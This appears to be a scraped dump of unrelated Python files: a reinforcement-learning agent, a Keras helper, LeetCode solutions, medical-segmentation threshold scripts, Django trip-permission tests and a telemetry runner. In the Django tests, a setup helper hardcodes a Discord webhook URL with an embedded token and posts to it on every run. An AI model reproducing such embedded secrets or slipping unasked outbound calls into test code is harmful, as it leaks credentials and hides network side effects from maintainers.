\"analyzer\": \"norwegian\"},\n \"pt\": {\"type\": \"text\", \"analyzer\": \"portuguese\"},\n \"ro\": {\"type\": \"text\", \"analyzer\": \"romanian\"},\n \"ru\": {\"type\": \"text\", \"analyzer\": \"russian\"},\n \"ku\": {\"type\": \"text\", \"analyzer\": \"sorani\"},\n \"cv\": {\"type\": \"text\", \"analyzer\": \"swedish\"},\n \"tr\": {\"type\": \"text\", \"analyzer\": \"turkish\"}\n }\n"},"size":{"kind":"number","value":5277,"string":"5,277"}}},{"rowIdx":897,"cells":{"max_stars_repo_path":{"kind":"string","value":"knrm/utils/base_conf.py"},"max_stars_repo_name":{"kind":"string","value":"gsgoncalves/K-NRM"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2023093"},"content":{"kind":"string","value":"# Copyright (c) 2017, University. 
All rights reserved.\n#\n# Use of the K-NRM package is subject to the terms of the software license set\n# forth in the LICENSE file included with this software, and also available at\n# https://github.com/AdeDZY/K-NRM/blob/master/LICENSE\n\nfrom os import path\n\nROOTPATH = path.dirname(path.dirname(path.dirname(path.abspath(__file__))))\nquery_field = 'query'\ntitle_field = 'title'\nbody_field = 'body'\n"},"size":{"kind":"number","value":438,"string":"438"}}},{"rowIdx":898,"cells":{"max_stars_repo_path":{"kind":"string","value":"python/hardway/ex17_1.py"},"max_stars_repo_name":{"kind":"string","value":"petervdb/eLearning"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2024442"},"content":{"kind":"string","value":"from sys import argv\nfrom os.path import exists\n\n# short version of ex17_0.py\n# The script requires 2 arguments. The original filename and the new filename\nscript, from_file, to_file = argv\n\nprint \"Copying from %s to %s\" % (from_file, to_file)\n\nindata = open(from_file).read()\n\nout_file = open(to_file, 'w')\nout_file.write(indata)\n\nout_file.close()\n"},"size":{"kind":"number","value":349,"string":"349"}}},{"rowIdx":899,"cells":{"max_stars_repo_path":{"kind":"string","value":"LocaleStringBuilder.py"},"max_stars_repo_name":{"kind":"string","value":"FlasHAdi/LocaleString-LocaleQuest-Builder"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2024497"},"content":{"kind":"string","value":"__author__ = \"Owsap\"\r\n__copyright__ = \"Copyright 2020, Owsap Productions\"\r\n__license__ = \"MIT\"\r\n__version__ = \"1.0.0\"\r\n\r\nimport os\r\nimport sys\r\nimport logging\r\n\r\nLOG_FILE_NAME = \"LocaleStringBuilder.log\" # Log file\r\nLOCALE_STRING_FILE = \"locale_string.txt\" # Locale string file name\r\nLOCALE_STRING_BASE_FILE = \"share/locale_string_vnum.txt\" # Reference file name (String VNUM)\r\n\r\nif not os.path.exists(\"log\"):\r\n\tos.mkdir(\"log\")\r\n\r\nlogging.basicConfig(filename = \"log/\" + LOG_FILE_NAME, level = logging.DEBUG, format = '%(asctime)s %(message)s', datefmt = '%d/%m/%Y %H:%M:%S')\r\n\r\ndef GetLocaleStringFile(locale):\r\n\treturn \"locale/%s/%s\" % (locale, LOCALE_STRING_FILE)\r\n\r\ndef TransalteLocaleString(locale):\r\n\tif not os.path.exists(LOCALE_STRING_BASE_FILE):\r\n\t\tprint \"Reference file not found. %s\" % LOCALE_STRING_BASE_FILE\r\n\t\tlogging.warning(\"Reference file not found. 
%s\" % LOCALE_STRING_BASE_FILE)\r\n\t\treturn\r\n\r\n\tlocaleStringOutput = \"locale_string_%s.txt\" % locale\r\n\tif os.path.exists(localeStringOutput):\r\n\t\tos.remove(localeStringOutput)\r\n\r\n\tfileOutput = open(localeStringOutput, 'a')\r\n\tfor line in open(LOCALE_STRING_BASE_FILE, 'r'):\r\n\t\tsplit = line.split('\";')\r\n\t\tvnum = split[0][1:]\r\n\r\n\t\tif not vnum:\r\n\t\t\tprint \"\"\r\n\t\t\tfileOutput.write(\"\")\r\n\r\n\t\tif not vnum.isdigit():\r\n\t\t\tformated = split[0] + \"\\\";\"\r\n\t\t\tprint (formated.rsplit(\"\\n\", 1)[0])\r\n\t\t\tfileOutput.write(formated.rsplit(\"\\n\")[0] + \"\\n\")\r\n\t\t\tcontinue\r\n\r\n\t\tprint GetTranslationVnum(locale, vnum)\r\n\t\tfileOutput.write(GetTranslationVnum(locale, vnum) + \"\\n\")\r\n\r\n\tfileOutput.close()\r\n\r\ndef GetTranslationVnum(locale, vnum):\r\n\tlineCount = 0\r\n\tfor line in open(GetLocaleStringFile(locale), 'r'):\r\n\t\tlineCount += 1\r\n\t\tmatch = line.find(vnum)\r\n\t\tif match == 0:\r\n\t\t\tlocaleStringFile = open(GetLocaleStringFile(locale), 'r')\r\n\t\t\tlocaleText = str(localeStringFile.readlines()[lineCount - 1])\r\n\t\t\tsplit = localeText.split(\"\\t\")\r\n\t\t\tformated = \"\\\"\" + split[1]\r\n\r\n\t\t\treturn (formated.rsplit(\"\\n\", 1)[0]) + \"\\\";\"\r\n\r\nif __name__ == \"__main__\":\r\n\tif len(sys.argv) < 2:\r\n\t\tprint \"USAGE: [locale]\"\r\n\t\tlocale = raw_input(\"Enter locale name: \")\r\n\t\tTransalteLocaleString(str(locale))\r\n\r\n\telif len(sys.argv) == 2:\r\n\t\tTransalteLocaleString(sys.argv[1])\r\n"},"size":{"kind":"number","value":2189,"string":"2,189"}}}],"truncated":false,"partial":false},"paginationData":{"pageIndex":8,"numItemsPerPage":100,"numTotalItems":129320,"offset":800,"length":100}},"jwt":"eyJhbGciOiJFZERTQSJ9.eyJyZWFkIjp0cnVlLCJwZXJtaXNzaW9ucyI6eyJyZXBvLmNvbnRlbnQucmVhZCI6dHJ1ZX0sImlhdCI6MTc1NjM5NjAwMSwic3ViIjoiL2RhdGFzZXRzL2xvdWJuYWJubC9zdGFyY29kZXJkYXRhX3B5X3Ntb2wiLCJleHAiOjE3NTYzOTk2MDEsImlzcyI6Imh0dHBzOi8vaHVnZ2luZ2ZhY2UuY28ifQ.EFgdtuHRJw-wCktOV4DGWF3B3m-v8QZLTUWU7CIQSZMFQ_Sfp6blPPy72sXkaNiiGrEAVO0rVysmiwUpH_G8Bw","displayUrls":true},"discussionsStats":{"closed":0,"open":0,"total":0},"fullWidth":true,"hasGatedAccess":true,"hasFullAccess":true,"isEmbedded":false,"savedQueries":{"community":[],"user":[]}}">
#!/usr/bin/env python
# coding=utf-8
'''
Author: John
Email: <EMAIL>
Date: 2021-03-12 16:14:34
LastEditor: John
LastEditTime: 2021-05-05 16:58:39
Description:
Environment:
'''
import numpy as np
from collections import defaultdict
import torch
import dill
class FisrtVisitMC:
''' On-Policy First-Visit MC Control
'''
def __init__(self,n_actions,cfg):
self.n_actions = n_actions
self.epsilon = cfg.epsilon
self.gamma = cfg.gamma
self.Q_table = defaultdict(lambda: np.zeros(n_actions))
self.returns_sum = defaultdict(float) # sum of returns
self.returns_count = defaultdict(float)
def choose_action(self,state):
        '''epsilon-greedy policy'''
if state in self.Q_table.keys():
best_action = np.argmax(self.Q_table[state])
action_probs = np.ones(self.n_actions, dtype=float) * self.epsilon / self.n_actions
action_probs[best_action] += (1.0 - self.epsilon)
action = np.random.choice(np.arange(len(action_probs)), p=action_probs)
else:
action = np.random.randint(0,self.n_actions)
return action
def update(self,one_ep_transition):
# Find all (state, action) pairs we've visited in this one_ep_transition
# We convert each state to a tuple so that we can use it as a dict key
sa_in_episode = set([(tuple(x[0]), x[1]) for x in one_ep_transition])
for state, action in sa_in_episode:
sa_pair = (state, action)
            # Find the first occurrence of the (state, action) pair in the one_ep_transition
first_occurence_idx = next(i for i,x in enumerate(one_ep_transition)
if x[0] == state and x[1] == action)
            # Sum up all rewards since the first occurrence
G = sum([x[2]*(self.gamma**i) for i,x in enumerate(one_ep_transition[first_occurence_idx:])])
# Calculate average return for this state over all sampled episodes
self.returns_sum[sa_pair] += G
self.returns_count[sa_pair] += 1.0
self.Q_table[state][action] = self.returns_sum[sa_pair] / self.returns_count[sa_pair]
def save(self,path):
        '''Save the Q-table data to a file
        '''
torch.save(
obj=self.Q_table,
f=path+"Q_table",
pickle_module=dill
)
def load(self, path):
        '''Load data from a file into the Q-table
        '''
        self.Q_table = torch.load(f=path+"Q_table",pickle_module=dill)
2,511
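A minimal training-loop sketch for the agent above, not part of the original file: it assumes an older gym-style API in which reset() returns the state and step() returns a 4-tuple, an environment whose states are hashable tuples (Blackjack is one example), and a small config object carrying epsilon and gamma; the environment id and hyper-parameter values are placeholders.

import gym
from types import SimpleNamespace

cfg = SimpleNamespace(epsilon=0.1, gamma=0.9)            # assumed hyper-parameters
env = gym.make("Blackjack-v1")                           # any env with tuple states and discrete actions
agent = FisrtVisitMC(env.action_space.n, cfg)

for episode in range(1000):
    state = env.reset()                                  # older gym API: reset() returns the state
    one_ep_transition = []                               # list of (state, action, reward) tuples
    done = False
    while not done:
        action = agent.choose_action(state)
        next_state, reward, done, _ = env.step(action)   # older gym API: 4-tuple
        one_ep_transition.append((state, action, reward))
        state = next_state
    agent.update(one_ep_transition)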
Head Pose Estimation/keras_NN.py
nixingyang/Kaggle-Face-Verification
0
2024241
from keras.callbacks import ModelCheckpoint
from keras.layers.advanced_activations import PReLU
from keras.layers.core import Activation, Dense, Dropout
from keras.layers.normalization import BatchNormalization
from keras.models import Sequential
from keras.utils import np_utils
from sklearn.preprocessing import LabelEncoder, StandardScaler
import numpy as np
def preprocess_data(X, scaler=None):
if not scaler:
scaler = StandardScaler()
scaler.fit(X)
X = scaler.transform(X)
return X, scaler
def preprocess_labels(labels, encoder=None, categorical=True):
if not encoder:
encoder = LabelEncoder()
encoder.fit(labels)
y = encoder.transform(labels).astype(np.int32)
if categorical:
y = np_utils.to_categorical(y)
return y, encoder
def generate_prediction(X_train, Y_train, X_test, is_classification, \
layer_size=512, layer_num=3, dropout_ratio=0.5, \
batch_size=128, nb_epoch=100, validation_split=0.2):
print("Initiate a model ...")
model = Sequential()
model.add(Dense(layer_size, input_shape=(X_train.shape[1],)))
model.add(PReLU())
model.add(BatchNormalization())
model.add(Dropout(dropout_ratio))
for _ in range(layer_num - 1):
model.add(Dense(layer_size))
model.add(PReLU())
model.add(BatchNormalization())
model.add(Dropout(dropout_ratio))
if is_classification:
unique_labels = np.unique(Y_train)
model.add(Dense(unique_labels.size))
model.add(Activation("softmax"))
model.compile(loss="categorical_crossentropy", optimizer="adam")
else:
model.add(Dense(1))
model.compile(loss="mean_absolute_error", optimizer="rmsprop")
print("Perform normalization ...")
X_train, scaler = preprocess_data(X_train)
X_test, _ = preprocess_data(X_test, scaler)
print("Perform training phase ...")
optimal_model_file_path = "/tmp/optimal_model.hdf5"
checkpointer = ModelCheckpoint(filepath=optimal_model_file_path,
save_best_only=True)
if is_classification:
categorical_Y_train, encoder = preprocess_labels(Y_train)
model.fit(X_train, categorical_Y_train, batch_size=batch_size, nb_epoch=nb_epoch, \
callbacks=[checkpointer], validation_split=validation_split)
else:
model.fit(X_train, Y_train, batch_size=batch_size, nb_epoch=nb_epoch, \
callbacks=[checkpointer], validation_split=validation_split)
print("Load optimal coefficients ...")
model.load_weights(optimal_model_file_path)
print("Generate prediction ...")
if is_classification:
classes = model.predict_classes(X_test, batch_size=batch_size)
prediction = encoder.inverse_transform(classes)
else:
prediction = model.predict(X_test, batch_size=batch_size)
return prediction
2,939
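A hedged usage sketch for generate_prediction above, not part of the original file: the toy arrays, class labels and layer sizes are invented for illustration, and the call relies on the same old Keras 1.x-style API (nb_epoch) that the file itself uses.

import numpy as np

# toy data: 1000 training rows with 20 features, 3 class labels, 200 test rows
X_train = np.random.rand(1000, 20)
Y_train = np.random.choice(["cat", "dog", "bird"], size=1000)
X_test = np.random.rand(200, 20)

prediction = generate_prediction(X_train, Y_train, X_test, is_classification=True,
                                 layer_size=128, layer_num=2,
                                 nb_epoch=10, validation_split=0.1)
print(prediction[:10])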
hardfork/coinclients/exceptions.py
topor-dev/hardfork-tracker
0
2024139
class BaseCoinClientException(Exception):
pass
class CoinClientUnexpectedException(BaseCoinClientException):
pass
__all__ = ['BaseCoinClientException', 'CoinClientUnexpectedException']
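A small, hypothetical illustration of how calling code might use this exception hierarchy; fetch_block and client.get_block are invented names, not part of the package.

def fetch_block(client, height):
    try:
        return client.get_block(height)      # hypothetical client call
    except BaseCoinClientException:
        raise                                # already a known client-side error
    except Exception as exc:
        # wrap anything unexpected so callers only need to catch the base class
        raise CoinClientUnexpectedException(str(exc)) from exc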
import os
from mp.paths import JIP_dir
import numpy as np
from skimage.measure import label,regionprops
import matplotlib.pyplot as plt
import math
from sklearn.mixture import GaussianMixture
#set environment variables
#for data_dirs folder, nothing changed compared to Simon's version
os.environ["WORKFLOW_DIR"] = os.path.join(JIP_dir, 'data_dirs')
os.environ["OPERATOR_IN_DIR"] = "input"
os.environ["OPERATOR_OUT_DIR"] = "output"
os.environ["OPERATOR_TEMP_DIR"] = "temp"
os.environ["OPERATOR_PERSISTENT_DIR"] = os.path.join(JIP_dir, 'data_dirs', 'persistent')
# preprocessing dir and subfolders
os.environ["PREPROCESSED_WORKFLOW_DIR"] = os.path.join(JIP_dir, 'preprocessed_dirs')
os.environ["PREPROCESSED_OPERATOR_OUT_SCALED_DIR"] = "output_scaled"
os.environ["PREPROCESSED_OPERATOR_OUT_SCALED_DIR_TRAIN"] = "output_scaled_train"
#dir where train data for intensities is stored (this only needs to be train_dirs, but since I have more
# datasets, another subfolder is here)
os.environ["TRAIN_WORKFLOW_DIR"] = os.path.join(JIP_dir, 'train_dirs')
#ignore
##below is for Christian only, used for older data structures that models are trained on
os.environ["TRAIN_WORKFLOW_DIR_GT"] = os.path.join('Covid-RACOON','All images and labels')
os.environ["TRAIN_WORKFLOW_DIR_PRED"] = os.path.join('Covid-RACOON','All predictions')
#os.environ["TRAIN_WORKFLOW_DIR_GT"] = os.path.join('gt_small')
#os.environ["TRAIN_WORKFLOW_DIR_PRED"] = os.path.join('pred_small')
#which mode is active either 'train' or 'inference'
os.environ["INFERENCE_OR_TRAIN"] = 'train'
#ignore
# the ending of the image files in train_dir is only for older datasets
os.environ["INPUT_FILE_ENDING"] = 'nii.gz'
from mp.utils.preprocess_utility_functions import basic_preprocessing
from mp.utils.preprocess_utility_functions import extract_features_all_data,compute_all_prediction_dice_scores
from train_restore_use_models.train_int_based_quantifier import train_dice_predictor
from mp.utils.intensities import sample_intensities
from mp.models.densities.density import Density_model
from mp.utils.feature_extractor import Feature_extractor
## work on variable 3, connected components
def poisson(lam,b):
    return ((lam**b) * np.exp(-lam)) / math.factorial(b)
def gaussian(mu,std,b):
return ((1 / (np.sqrt(2 * np.pi) * std)) *
np.exp(-0.5 * (1 / std * (b - mu))**2))
def load_seg_features():
features = []
dens = Density_model()
feat_extr = Feature_extractor(dens)
work_path = os.path.join(os.environ["PREPROCESSED_WORKFLOW_DIR"],os.environ["PREPROCESSED_OPERATOR_OUT_SCALED_DIR_TRAIN"])
for id in os.listdir(work_path):
id_path = os.path.join(work_path,id)
seg_path_short = os.path.join(id_path,'seg')
seg_features_path = os.path.join(seg_path_short,'features.json')
feat_vec = feat_extr.read_feature_vector(seg_features_path)
if not np.isnan(np.sum(np.array(feat_vec))):
features.append(feat_vec)
return np.array(features)
def plot_conn_comp(data,save=True,fit=True):
save_path = os.path.join('storage','Results','histogramms','connected components poisson')
mu = np.mean(data)
std = np.std(data)
_ , bins, _ = plt.hist(data,75,(0,np.max(data)),density=True)
if fit:
y = [poisson(mu,b) for b in bins]
plt.plot(bins,y,'--')
    plt.title('Segmentations connected components poisson')
if save:
plt.savefig(save_path)
plt.show()
def conn_comp_n_percent(data,percent):
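    # smallest integer bin edge at which the cumulative density of
    # connected-component counts exceeds `percent` (used as a threshold)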
hist, bin_edges = np.histogram(data,bins=np.arange(0,np.max(data),step=1),density=True)
cum_hist = np.cumsum(hist)
for i in range(len(cum_hist)):
if cum_hist[i]>percent:
return math.ceil(bin_edges[i])
## work for avg slice dice
def plot_slice_dice_hist(data,save=False):
_ , _, _ = plt.hist(data,50,(np.min(data),1),density=True)
plt.show()
def slice_dice_n_percent(data,percent):
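    # scan the histogram of average slice-dice values from the top down and
    # return the bin edge once `percent` of the samples has been accumulated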
bins = np.arange(np.min(data),1,step=0.001)
hist, bin_edges = np.histogram(data,bins=bins)
total_points = np.sum(hist)
dens = np.array(hist)/total_points
dens_flipped = np.flip(dens)
dens_flipped_cumsum = np.cumsum(dens_flipped)
for i in range(len(dens_flipped_cumsum)):
if dens_flipped_cumsum[i]>percent:
            return bin_edges[len(hist)-1-i]
## work for int mode
def plot_int_mode_hist(data,threshholds=[],save=False):
#get histogram
_ , bins, _ = plt.hist(data,100,(0,1),density=True)
#get gaussian fit
gm = GaussianMixture(n_components=2).fit(np.reshape(data,(-1,1)))
means = [gm.means_[0][0],gm.means_[1][0]]
vars = [gm.covariances_[0][0][0],gm.covariances_[1][0][0]]
weights = [gm.weights_[0],gm.weights_[1]]
y0 = weights[0]*np.array([gaussian(means[0],vars[0]**(1/2),b) for b in bins])
y1 = weights[1]*np.array([gaussian(means[1],vars[1]**(1/2),b) for b in bins])
y = y0 + y1
plt.plot(bins,y)
plt.vlines(threshholds,0,5,colors="r")
plt.show()
def int_mode_n_percent(data,percent):
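    # fit a 2-component Gaussian mixture to the intensity-mode values, then grow
    # histogram bins outwards from the two mode bins until roughly `percent` of
    # the samples is covered; returns 2 bin edges if the two intervals overlap,
    # otherwise 4 (left/right edge around each mode)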
data = np.reshape(data,(-1,1))
#first fit a mixture with 2 components to find 2 modes
gm = GaussianMixture(n_components=2).fit(data)
if gm.means_[0][0] < gm.means_[1][0]:
means = [gm.means_[0][0],gm.means_[1][0]]
vars = [gm.covariances_[0][0][0],gm.covariances_[1][0][0]]
weights = [gm.weights_[0],gm.weights_[1]]
# try to balance the steplengths, according to weights and cov
step_0 = vars[0]*weights[0]
step_1 = vars[1]*weights[1]
else:
means = [gm.means_[1][0],gm.means_[0][0]]
vars = [gm.covariances_[1][0][0],gm.covariances_[0][0][0]]
weights = [gm.weights_[1],gm.weights_[0]]
# try to balance the steplengths, according to weights and std
step_0 = (vars[0]**(1/2))*(1/20)*weights[0]
step_1 = (vars[1]**(1/2))*(1/20)*weights[1]
#find the threshholds
hist_0, bins_0 = np.histogram(data,np.arange(0,1,step_0))
hist_1, bins_1 = np.histogram(data,np.arange(0,1,step_1))
number_points = np.sum(hist_0)
hist_0 = np.array(hist_0)/number_points
hist_1 = np.array(hist_1)/number_points
hist = [hist_0,hist_1]
bins = [bins_0,bins_1]
mode_0_bin = np.argmax(bins[0]>means[0])
mode_1_bin = np.argmax(bins[1]>means[1])
mode_bins = [mode_0_bin,mode_1_bin]
    # if the intervals are overlapping, the inner intervals are not increased in this case
overlapping = False
complete_0 = False
complete_1 = False
i = 0
mass = 0
while mass<percent:
        # check whether the intervals are overlapping
if bins[1][mode_bins[1]-i] < bins[0][mode_bins[0]+i+1] and not overlapping:
#add the bigger bin to the mass
overlapping = True
if weights[0]>weights[1]:
mass = mass + hist[0][mode_bins[0]+i]
else:
mass = mass + hist[1][mode_bins[1]-i]
if mode_bins[0]-i < 0 or mode_bins[0]+i > len(hist[0]):
complete_0 = True
if mode_bins[1]-i < 0 or mode_bins[1]+i > len(hist[1]):
complete_1 = True
        # if both distributions have reached their end, break the loop
        if complete_1 or complete_0:
break
#add masses
if i == 0:
mass = hist[0][mode_bins[0]]+hist[1][mode_bins[1]]
if overlapping:
            mass = mass + hist[0][mode_bins[0]-i]+hist[1][mode_bins[1]+i]
else:
mass0 = hist[0][mode_bins[0]-i]+hist[0][mode_bins[0]+i]
mass1 = hist[1][mode_bins[1]+i]+hist[1][mode_bins[1]-i]
mass = mass + mass0 + mass1
i = i + 1
if overlapping:
return [bins[0][mode_bins[0]-i+1],bins[1][mode_bins[1]+i]]
else:
return [bins[0][mode_bins[0]-i+1],bins[0][mode_bins[0]+i],bins[1][mode_bins[1]-i+1],bins[1][mode_bins[1]+i]]
def main(conn_comp=True,slice_dice=True,int_mode=True):
features = load_seg_features()
if conn_comp:
## variable 3, connected comp
plot_conn_comp(features[:,3],False,False)
thresh = conn_comp_n_percent(features[:,3],0.99)
print('The recommended threshold for connected components is {}'.format(thresh))
if slice_dice:
data = features[:,1]
plot_slice_dice_hist(data)
thresh = slice_dice_n_percent(data,0.99)
print('The recommended threshold for slice dices is {}'.format(thresh))
if int_mode:
data = features[:,4]
threshholds = int_mode_n_percent(data,0.80)
print(threshholds)
plot_int_mode_hist(data,threshholds)
if __name__ == "__main__":
main(False,False,True)
8,866
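A rough sanity-check sketch for the threshold helpers above, not part of the original file: the synthetic arrays are invented and the calls assume conn_comp_n_percent and slice_dice_n_percent are available in the same session.

import numpy as np

rng = np.random.default_rng(0)

# synthetic connected-component counts (integer-valued, mostly small)
fake_conn_comp = rng.poisson(4, 1000)
print(conn_comp_n_percent(fake_conn_comp, 0.99))

# synthetic average slice-dice values in (0, 1)
fake_slice_dice = rng.uniform(0.7, 0.99, 1000)
print(slice_dice_n_percent(fake_slice_dice, 0.99))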
leetcode/268-missing-number.py
AmrMKayid/KayAlgo
1
2024123
class Solution:
def missingNumber(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
missing = len(nums)
for index, num in enumerate(nums):
missing ^= index ^ num
return missing
231
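A short worked illustration of the XOR trick above, with invented example values: every index cancels against an equal value, leaving only the missing number.

# nums = [3, 0, 1]: missing starts at len(nums) = 3 and the loop computes
# 3 ^ (0 ^ 3) ^ (1 ^ 0) ^ (2 ^ 1) == (3 ^ 3) ^ (0 ^ 0) ^ (1 ^ 1) ^ 2 == 2
assert Solution().missingNumber([3, 0, 1]) == 2
assert Solution().missingNumber([0, 1]) == 2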
python/443.string-compression.py
fengbaoheng/leetcode
1
2024440
#
# @lc app=leetcode.cn id=443 lang=python3
#
# [443] String Compression
#
# https://leetcode-cn.com/problems/string-compression/description/
#
# algorithms
# Easy (33.53%)
# Total Accepted:    3.5K
# Total Submissions: 10.5K
# Testcase Example:  '["a","a","b","b","c","c","c"]'
#
# Given an array of characters, compress it using an in-place algorithm.
#
# The length after compression must always be less than or equal to the length
# of the original array.
#
# Every element of the array should be a character of length 1 (not of type int).
#
# After you are done modifying the input array in place, return the new length
# of the array.
#
#
#
# Follow up:
# Could you solve it using only O(1) extra space?
#
#
#
# Example 1:
#
#
# Input:
# ["a","a","b","b","c","c","c"]
#
# Output:
# Return 6, and the first 6 characters of the input array should be:
# ["a","2","b","2","c","3"]
#
# Explanation:
# "aa" is replaced by "a2". "bb" is replaced by "b2". "ccc" is replaced by "c3".
#
#
# Example 2:
#
#
# Input:
# ["a"]
#
# Output:
# Return 1, and the first 1 character of the input array should be: ["a"]
#
# Explanation:
# No characters are replaced.
#
#
# Example 3:
#
#
# Input:
# ["a","b","b","b","b","b","b","b","b","b","b","b","b"]
#
# Output:
# Return 4, and the first 4 characters of the input array should be:
# ["a","b","1","2"].
#
# Explanation:
# Since the character "a" does not repeat, it is not compressed.
# "bbbbbbbbbbbb" is replaced by "b12".
# Note that each digit has its own position in the array.
#
#
# Note:
#
#
# All characters have an ASCII value in the range [35, 126].
# 1 <= len(chars) <= 1000.
#
#
#
from typing import List
class Solution:
    # Two pointers: a slow write pointer p and fast read pointers qs/qe
def compress(self, chars: List[str]) -> int:
if chars is None:
return 0
length = len(chars)
if length == 0 or length == 1:
return length
p, qs, qe = 0, 0, 0
while True:
            # write the character of the current group
chars[p] = chars[qs]
p += 1
            # the fast pointer counts how many times the character occurs
while qe < length and chars[qe] == chars[qs]:
qe += 1
count = qe - qs
            # if the character occurs more than once, append the count digits
if count > 1:
count_char = list(str(count))
for i in range(len(count_char)):
chars[p] = count_char[i]
p += 1
            # stop once the whole array has been traversed
if qe == length:
break
qs = qe
return p
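A quick check of the two-pointer compression above, using the example from the problem statement:

chars = ["a", "a", "b", "b", "c", "c", "c"]
new_len = Solution().compress(chars)
print(new_len, chars[:new_len])   # 6 ['a', '2', 'b', '2', 'c', '3']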
letter = set()
alph = input()
for i in alph:
letter.add(i)
word = input()
largo = len(word)
rangoLargo = range(largo)
words = set()
for x in letter:
for i in rangoLargo:
word2 = word[0:i] + x + word[i:largo]
words.add(word2)
words.add(word + x)
for i in rangoLargo:
words.add(word[0:i] + word[i + 1: largo])
for x in letter:
for i in rangoLargo:
words.add(word[0:i] + x + word[i + 1: largo])
words = list(words)
words.sort()
for x in words:
if x != word:
print(x)
513
src/xsd_trips/tests.py
minyiky/xSACdb
0
2023636
import random
import requests
from django.contrib.auth.models import Group
from django.core.exceptions import PermissionDenied
from discord import Webhook, RequestsWebhookAdapter
from xSACdb.roles.groups import GROUP_TRIPS
from xSACdb.test_helpers import BaseTest
from xsd_auth.models import User
from xsd_frontend.tests import fake
from xsd_trips.models import Trip
class BaseTripTest(BaseTest):
def setUp(self):
self.member = User.objects.fake_single(self.fake)
self.trip_organiser = User.objects.fake_single(self.fake)
self.do = User.objects.fake_single(self.fake)
self.do.groups.add(Group.objects.get(pk=GROUP_TRIPS))
self.new_trip = self.create_a_trip()
self.open_trip = self.create_a_trip()
self.open_trip.set_approved(self.do)
self.open_trip.set_open(self.do)
def create_a_trip(self):
webhook = Webhook.from_url("https://discord.com/api/webhooks/839835947872288768/j-JqFQ6D-3SjRn9mPo_8TuU1dibzG9ykuQh6nGPgjovbv3zXrMIvXrQDnq22UwpZFVKU", adapter=RequestsWebhookAdapter())
webhook.send("Hello World")
return Trip.objects.create(
name=self.fake.name(),
date_start=self.fake.date_time_between(start_date='now', end_date='+10y').date(),
description='\n\n'.join(fake.paragraphs(nb=random.randrange(1, 4))),
owner=self.trip_organiser.profile,
)
class TripManagerTest(BaseTripTest):
def test_upcoming_hidden(self):
# Test a trip that hasn't been approved yet doesn't show up in the 'upcoming' list
self.assertFalse(self.new_trip in Trip.objects.upcoming())
def test_upcoming_hidden_all(self):
# Test a trip that hasn't been approved yet does show up in upcoming all
self.assertTrue(self.new_trip in Trip.objects.upcoming_all())
def test_upcoming_open(self):
# Test an open trip shows in upcoming
self.assertTrue(self.open_trip in Trip.objects.upcoming())
def test_private(self):
# New trips show in private
self.assertTrue(self.new_trip in Trip.objects.private())
class TripStateTest(BaseTripTest):
def test_state_class(self):
self.assertEqual(self.new_trip.state_class, 'trip-state-new')
def test_deny_trip(self):
# Member / trip owner cannot deny
self.assertFalse(self.new_trip.is_denied)
with self.assertRaises(PermissionDenied):
self.new_trip.set_approved(self.member)
with self.assertRaises(PermissionDenied):
self.new_trip.set_denied(self.trip_organiser)
# DO can
self.new_trip.set_denied(self.do)
self.new_trip.refresh_from_db()
self.assertTrue(self.new_trip.is_denied)
def test_approve_trip(self):
# Member / trip owner cannot approve
self.assertFalse(self.new_trip.is_approved)
with self.assertRaises(PermissionDenied):
self.new_trip.set_approved(self.member)
with self.assertRaises(PermissionDenied):
self.new_trip.set_approved(self.trip_organiser)
# DO can
self.new_trip.set_approved(self.do)
self.new_trip.refresh_from_db()
self.assertTrue(self.new_trip.is_approved)
def test_cancel_trip(self):
self.assertFalse(self.new_trip.is_cancelled)
# Random member cannot cancel trip
with self.assertRaises(PermissionDenied):
self.new_trip.set_cancelled(self.member)
# Organiser cannot open trip before its public
with self.assertRaises(PermissionDenied):
self.new_trip.set_cancelled(self.trip_organiser)
self.new_trip.set_approved(self.do)
with self.assertRaises(PermissionDenied):
self.new_trip.set_cancelled(self.trip_organiser)
# With public
self.new_trip.set_open(self.do)
self.new_trip.set_cancelled(self.trip_organiser)
self.new_trip.set_closed(self.do)
self.new_trip.set_cancelled(self.trip_organiser)
self.new_trip.refresh_from_db()
self.assertTrue(self.new_trip.is_cancelled)
def test_open_trip(self):
self.assertFalse(self.new_trip.is_open)
# Random member cannot open trip
with self.assertRaises(PermissionDenied):
self.new_trip.set_open(self.member)
# Organiser cannot open trip before its approved
with self.assertRaises(PermissionDenied):
self.new_trip.set_open(self.trip_organiser)
# With approval they can
self.new_trip.set_approved(self.do)
self.new_trip.set_open(self.trip_organiser)
self.new_trip.refresh_from_db()
self.assertTrue(self.new_trip.is_open)
def test_close_trip(self):
self.assertFalse(self.new_trip.is_closed)
# Random member cannot close trip
with self.assertRaises(PermissionDenied):
self.new_trip.set_closed(self.member)
# Organiser cannot open trip before its approved
with self.assertRaises(PermissionDenied):
self.new_trip.set_closed(self.trip_organiser)
# With approval they can
self.new_trip.set_approved(self.do)
self.new_trip.set_closed(self.trip_organiser)
self.new_trip.refresh_from_db()
self.assertTrue(self.new_trip.is_closed)
#!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import csv
import logging
import os
import sys
from telemetry.core import browser_finder
from telemetry.core import browser_options
from telemetry.page import block_page_benchmark_results
from telemetry.page import csv_page_benchmark_results
from telemetry.page import page_benchmark
from telemetry.page import page_runner
from telemetry.page import page_set
from telemetry.test import discover
def Main(benchmark_dir):
"""Turns a PageBenchmark into a command-line program.
Args:
benchmark_dir: Path to directory containing PageBenchmarks.
"""
benchmarks = discover.DiscoverClasses(benchmark_dir,
os.path.join(benchmark_dir, '..'),
page_benchmark.PageBenchmark)
# Naively find the benchmark. If we use the browser options parser, we run
# the risk of failing to parse if we use a benchmark-specific parameter.
benchmark_name = None
for arg in sys.argv:
if arg in benchmarks:
benchmark_name = arg
options = browser_options.BrowserOptions()
parser = options.CreateParser('%prog [options] <benchmark> <page_set>')
page_runner.PageRunner.AddCommandLineOptions(parser)
parser.add_option('--output-format',
dest='output_format',
default='csv',
help='Output format. Can be "csv" or "block". '
'Defaults to "%default".')
parser.add_option('-o', '--output',
dest='output_file',
help='Redirects output to a file. Defaults to stdout.')
parser.add_option('--output-trace-tag',
dest='output_trace_tag',
help='Append a tag to the key of each result trace.')
benchmark = None
if benchmark_name is not None:
benchmark = benchmarks[benchmark_name]()
